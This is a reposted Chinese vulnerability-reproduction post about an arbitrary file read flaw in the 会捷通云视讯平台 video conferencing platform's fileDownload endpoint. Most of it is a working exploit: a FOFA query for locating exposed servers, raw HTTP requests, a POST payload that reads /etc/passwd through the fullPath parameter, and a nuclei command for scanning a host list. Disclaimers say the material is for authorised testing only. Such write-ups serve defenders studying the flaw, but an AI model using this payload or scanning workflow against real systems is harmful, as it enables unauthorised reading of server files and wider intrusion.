0x01 阅读须知
融云安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
0x02 漏洞描述
会捷通云视讯平台是基于软视频会议在私有云或者公有云环境下提供的企业级视频通讯平台,可以为用户提供跨越企业内外,基于会议室、桌面和移动应用的视频通讯和会议解决方案。会捷通云视讯平台平台fileDownload处存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件。
0x03 漏洞复现
fofa:body="/him/api/rest/v1.0/node/role"
1.需要抓取如下包
GET
/him/api/rest/v1.0/node/role?_=1683365406850
HTTP/1.1
Host
: {{Hostname}}
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept
: */*
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding
: gzip, deflate
X-Requested-With
: XMLHttpRequest
DNT
: 1
Connection
: close
Referer: http://{{Hostname}}/
2.修改POC进行/etc/passwd读取
POST
/fileDownload
HTTP/1.1
Host
: {{Hostname}}
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection
: close
Cookie
: td_cookie=3499227148
Upgrade-Insecure-Requests
: 1
Content-Type
: application/x-www-form-urlencoded
Content-Length
: 46
action
=downloadBackupFile&fullPath=/etc/passwd
2.nuclei验证已发表于知识星球
nuclei
.exe
-t
Huijietong_fileDownload_Read
.yaml
-l
subs
.txt
-stats
原文始发于微信公众号(融云攻防实验室):漏洞复现 会捷通云视讯平台 fileDownload 任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论